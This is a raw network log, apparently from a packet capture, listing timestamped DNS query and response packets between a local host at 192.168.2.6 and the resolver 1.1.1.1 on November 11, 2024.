Nov 11, 2024 18:14:02.886944056 CET	53	58024	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.887965918 CET	61552	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.888250113 CET	53	52255	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.888264894 CET	53	60886	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.888277054 CET	53	56689	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.892326117 CET	53	57178	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.892868042 CET	53	55237	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.893043041 CET	53	55175	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.893223047 CET	53	65401	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.893959045 CET	53	58594	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.894385099 CET	53	63507	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.897572994 CET	53	61552	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.899301052 CET	53	58153	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.899918079 CET	50756	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.901166916 CET	62227	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.902456999 CET	50459	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.902518034 CET	61401	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.904618025 CET	57760	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.907804012 CET	53	50344	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.908601999 CET	53	55091	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.909862995 CET	53	62227	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.910003901 CET	53	53214	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.910348892 CET	53	55051	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.912514925 CET	53	61401	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.912605047 CET	53	52893	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.913423061 CET	53	57829	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.914768934 CET	53	57760	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.915127039 CET	53	58578	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.918070078 CET	55715	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.921360970 CET	58054	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.926139116 CET	53	50459	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.930989027 CET	53	58054	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.931464911 CET	53	50756	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.948694944 CET	53	55715	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.974509954 CET	55836	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.974510908 CET	52405	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.974806070 CET	63551	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.974960089 CET	62053	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.975086927 CET	63068	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.975263119 CET	50667	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.975332975 CET	64213	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.975667000 CET	63165	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.975827932 CET	56708	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.975989103 CET	54197	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.976139069 CET	61596	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.976288080 CET	53161	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.976425886 CET	53080	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.976576090 CET	59073	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.981080055 CET	62815	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:02.984571934 CET	53	56708	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.985286951 CET	53	55836	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.985583067 CET	53	50667	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.985759020 CET	53	63551	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.985771894 CET	53	64213	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.986685038 CET	53	62053	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.986799002 CET	53	52405	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.986814976 CET	53	59073	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.987530947 CET	53	53080	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.988159895 CET	53	63165	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:02.989770889 CET	53	53161	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.007323980 CET	53	63068	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.009205103 CET	53	61596	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.009360075 CET	53	54197	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.015121937 CET	53	62815	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.015863895 CET	51271	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.020931959 CET	55691	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.021554947 CET	56038	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.021924019 CET	63846	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.023900986 CET	54027	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.025027037 CET	51069	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.025298119 CET	57642	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.027074099 CET	60290	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.027290106 CET	49308	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.027323961 CET	51582	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.027544975 CET	64372	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.027642965 CET	60210	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.028049946 CET	53	51271	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.028691053 CET	63037	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.032881021 CET	53	55691	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.034303904 CET	53	63846	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.036988020 CET	53	54027	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.040926933 CET	53	57642	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.041682959 CET	53	56038	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.042175055 CET	53	51582	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.042766094 CET	53	60210	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.043397903 CET	53	49308	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.043958902 CET	53	63037	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.046859980 CET	57407	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.047256947 CET	61463	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.056327105 CET	51634	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.056570053 CET	61789	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.059297085 CET	53	61463	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.060163975 CET	53	51069	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.062192917 CET	53	60290	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.065145016 CET	53	64372	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.069401026 CET	53	61789	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.069425106 CET	53	51634	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.081582069 CET	53	57407	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.115113020 CET	64675	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.115159988 CET	64725	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.116687059 CET	56017	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:03.129875898 CET	53	56017	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.149805069 CET	53	64675	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:03.150995016 CET	53	64725	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.725248098 CET	50727	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.725302935 CET	56187	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.725824118 CET	63822	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.726454020 CET	53080	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.727231026 CET	49840	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.727617025 CET	50922	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.727749109 CET	51533	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.728315115 CET	53719	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.730294943 CET	63723	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.736269951 CET	53	53080	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.736859083 CET	53	49840	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.738087893 CET	53	51533	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.739013910 CET	52660	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.740247965 CET	53	53719	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.742593050 CET	58944	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.743263006 CET	53	63822	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.744281054 CET	62770	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.744750023 CET	54488	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.747870922 CET	53	52660	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.748939991 CET	53	63723	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.748967886 CET	64785	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.752357006 CET	53	54488	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.756891012 CET	53	56187	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.757020950 CET	53	50727	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.759793997 CET	53	50922	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.760242939 CET	53	64785	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.762159109 CET	53	58944	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.765072107 CET	63559	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.773086071 CET	56035	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.776245117 CET	53	62770	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.779829025 CET	54766	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.783617973 CET	52005	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.785326004 CET	62732	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.785670996 CET	53	56035	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.787760019 CET	58167	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.789154053 CET	56290	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.791130066 CET	49534	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.793106079 CET	61112	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.793482065 CET	49904	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.794636965 CET	54639	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.794873953 CET	53	62732	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.795175076 CET	60446	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.795701027 CET	53	63559	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.798528910 CET	53	56290	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.798715115 CET	53	58167	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.802421093 CET	53	61112	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.804538012 CET	53	60446	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.804625034 CET	53	54639	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.808871031 CET	53	49534	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.811295986 CET	53	54766	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.815247059 CET	53	52005	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.824275970 CET	53	49904	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.831319094 CET	64524	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.831765890 CET	53294	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.831971884 CET	61696	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.832165003 CET	55063	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.832477093 CET	63407	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.834511995 CET	60076	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.834997892 CET	60779	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.835161924 CET	53980	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.835294962 CET	61772	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.835453987 CET	50180	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.835613012 CET	58602	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.835747957 CET	55597	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.836044073 CET	50474	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.836245060 CET	54066	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.836421967 CET	62836	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.836729050 CET	62508	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.836905003 CET	63498	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.837054014 CET	56846	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.837207079 CET	62332	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.837371111 CET	65336	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.837559938 CET	52542	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.837817907 CET	59930	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.837975025 CET	56192	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.838387966 CET	53368	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.838537931 CET	55379	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.841306925 CET	53	53294	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.841439962 CET	53	64524	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.841815948 CET	64476	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.842030048 CET	53	61696	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.842273951 CET	51335	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.843218088 CET	53	55063	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.843410969 CET	53	60076	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.844074011 CET	53	62836	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.844564915 CET	58402	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.844605923 CET	53	60779	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.845268011 CET	53	58602	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.846040964 CET	49963	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.846663952 CET	53	56846	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.846869946 CET	53	54066	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.847119093 CET	53	63498	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.847455025 CET	53	65336	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.847569942 CET	53	52542	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.848143101 CET	53	62332	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.848761082 CET	53	56192	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.850712061 CET	53	63407	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.852406979 CET	53	51335	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.852783918 CET	53	64476	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.853219032 CET	53	58402	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.856169939 CET	53	62508	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.857439041 CET	53	49963	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.859020948 CET	53	53980	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.865886927 CET	58763	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.866153955 CET	53	61772	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.866157055 CET	65477	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.866193056 CET	53	55597	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.866321087 CET	51917	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.866336107 CET	64242	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.866517067 CET	53568	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.866808891 CET	63361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.867002964 CET	54572	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.867115021 CET	53	50180	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.868246078 CET	53	50474	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.868830919 CET	53	59930	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.869138002 CET	53	55379	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.869810104 CET	53	53368	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.875403881 CET	53	58763	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.876065016 CET	53	54572	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.876776934 CET	53	53568	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.877034903 CET	53	63361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.877089977 CET	53	65477	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.898248911 CET	53	64242	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.899360895 CET	53	51917	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:04.996392012 CET	60373	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:04.996710062 CET	63309	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:05.007163048 CET	53	60373	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:05.028227091 CET	53	63309	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.107526064 CET	51452	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.112737894 CET	56403	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.112950087 CET	56520	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.113291979 CET	50276	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.117867947 CET	61939	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.118123055 CET	53	51452	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.122951031 CET	53	56403	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.123681068 CET	53354	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.123701096 CET	53	56520	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.124139071 CET	59859	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.124222040 CET	53	50276	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.127585888 CET	63693	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.129592896 CET	49225	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.130697012 CET	64769	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.131465912 CET	59456	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.131668091 CET	53221	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.132314920 CET	56643	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.133021116 CET	55944	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.133120060 CET	64217	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.133790016 CET	60611	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.134890079 CET	62518	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.135035038 CET	53	53354	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.138220072 CET	53	59859	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.141679049 CET	53	59456	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.142950058 CET	53	55944	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.142962933 CET	53	64217	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.144112110 CET	53	56643	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.148904085 CET	53	49225	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.149969101 CET	53	61939	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.155214071 CET	62458	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.155849934 CET	62168	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.159756899 CET	53	63693	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.163476944 CET	53	64769	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.163878918 CET	53	53221	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.165132046 CET	53	60611	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.166119099 CET	53	62168	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.167279959 CET	53	62458	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.170248985 CET	53	62518	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.194150925 CET	50737	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.195485115 CET	53300	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.195693016 CET	63672	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.195983887 CET	50932	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.196304083 CET	65528	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.196496010 CET	58535	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.196655035 CET	64296	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.197279930 CET	63594	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.197815895 CET	50562	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.199820995 CET	58317	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.200067043 CET	51174	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.203866959 CET	53	64296	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.203882933 CET	53	50737	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.206208944 CET	53	50562	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.206221104 CET	53	50932	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.206862926 CET	53	63672	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.206873894 CET	53	58535	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.210366011 CET	53	58317	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.217153072 CET	56660	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.217432022 CET	63626	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.218523026 CET	49339	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.218719006 CET	65369	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.219343901 CET	59714	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.221718073 CET	64090	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.226248026 CET	60011	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.227654934 CET	53	63626	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.227822065 CET	51334	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.227998018 CET	53	53300	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.228017092 CET	56160	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.228056908 CET	60629	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:06.228717089 CET	53	65369	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.228729963 CET	53	63594	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.230501890 CET	53	65528	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.230531931 CET	53	59714	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.232337952 CET	53	49339	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.232348919 CET	53	51174	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.237881899 CET	53	60011	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.238010883 CET	53	56160	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.238554955 CET	53	51334	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.250179052 CET	53	56660	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.254235029 CET	53	64090	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:06.260226011 CET	53	60629	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.297807932 CET	58155	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.300187111 CET	53979	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.301135063 CET	58329	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.310075045 CET	65520	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.310739994 CET	51042	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.311224937 CET	56227	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.311671019 CET	56976	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.312320948 CET	64589	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.313481092 CET	64257	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.315432072 CET	53	53979	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.315752983 CET	57697	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.315989017 CET	63630	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.318478107 CET	58581	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.318609953 CET	52757	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.319395065 CET	62924	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.319439888 CET	65514	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.321082115 CET	53	56227	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.322904110 CET	53	64589	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.325942993 CET	53	63630	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.327330112 CET	56640	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.329788923 CET	53	65514	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.329823017 CET	53	58155	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.329833984 CET	56598	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.331269026 CET	55745	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.331861019 CET	60895	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.332479000 CET	60091	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:14:52.333076000 CET	53	58329	1.1.1.1	192.168.2.6
Nov 11, 2024 18:14:52.334216118 CET	53637	53	192.168.2.6	1.1.1.1
